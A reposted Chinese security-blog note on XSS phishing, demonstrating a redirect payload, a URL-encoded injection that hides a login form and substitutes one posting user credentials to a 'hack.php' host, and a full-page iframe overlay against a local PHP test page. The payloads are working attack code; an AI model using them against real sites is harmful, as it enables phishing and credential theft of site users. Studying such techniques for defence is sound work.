技术笔记

XSS常见的钓鱼方式

字号+ 作者:sn0w 来源:转载 2016-11-27 16:18 我要评论( )

1.重定向钓鱼: 正常的用户URL为 http://localhost/cookie1.php?user=UserNamepass=PassWordname=login ,由于我们的程序并没有对提交的数据进行处理,而直接输出......

1.重定向钓鱼:
正常的用户URL为http://localhost/cookie1.php?user=UserName&pass=PassWord&name=login,由于我们的程序并没有对提交的数据进行处理,而直接输出,那么用户就可以通过提交特定的数据实现重定向。
XSS常见的钓鱼方式 - sn0w - 雪花 - sn0w
 当用户访问 ,页面被重定向到钓鱼页面。

http://localhost/cookie1.php?user=<script>document.location.href="http://127.0.0.1/phishing.html"</script>&pass=PassWord&name=login

XSS常见的钓鱼方式 - sn0w - 雪花 - sn0w
 

 

2.HTML注入式攻击

利用XSS向页面中插入HTML/Javascript代码,由于没有进行过滤,代码将直接被浏览器解析。

http://localhost/cookie1.php?user=%3Cscript%3Evar%20biaodan=document.getElementById%28%27login%27%29;biaodan.style=%22display:none%22%3C/script%3E%3Chtml%3E%3Cform%20action=%22192.168.0.1/hack.php%22%20method=%22get%22%3E%3Cinput%20type=%22text%22%20name=%22user%22%20value=%22UserName%22%3E%3Cinput%20type=%22text%22%20name=%22pass%22%20value=%22PassWord%22%3E%3Cinput%20type=%22submit%22%20name=%22name%22%20value=%22login%22%3E%3C/form%3E%3C/html%3E&pass=&name=login

浏览器解析后,隐藏了原来的登录表单,生成了一个新的表单并将数据提交到指定的地址。
XSS常见的钓鱼方式 - sn0w - 雪花 - sn0w
 

 3.XSS跨框架钓鱼

通过<iframe>标签嵌入一个远程域,以覆盖原有的页面

<div style="position:absolute;top:0px;left:0px;width:100%;height:100%"><iframe src=http://127.0.0.1/phishing.html width=100% height=100%></iframe></div>

详细看这篇日志:http://ixuehua.blog.163.com/blog/static/259952038201642532524650/
XSS常见的钓鱼方式 - sn0w - 雪花 - sn0w

 

4.flash钓鱼

等待补充。。。。


本文来自: 蜗蜗侠's Blog-关注网络安全 http://blog.icxun.cn/Note/348.html

1.本站遵循行业规范,任何转载的稿件都会明确标注作者和来源;2.本站的原创文章,请转载时务必注明文章作者和来源,不尊重原创的行为我们将追究责任;3.作者投稿可能会经我们编辑修改或补充。

相关文章
  • xss字符过大多waf思路

    xss字符过大多waf思路

    2017-04-18 08:42

  • XSS构造剖析

    XSS构造剖析

    2016-12-19 14:31

  • XSS后门的使用及隐藏

    XSS后门的使用及隐藏

    2016-12-18 14:38

  • XSS Phishing (XSS钓鱼)

    XSS Phishing (XSS钓鱼)

    2016-11-27 16:24

网友点评
暂时未开启评论功能~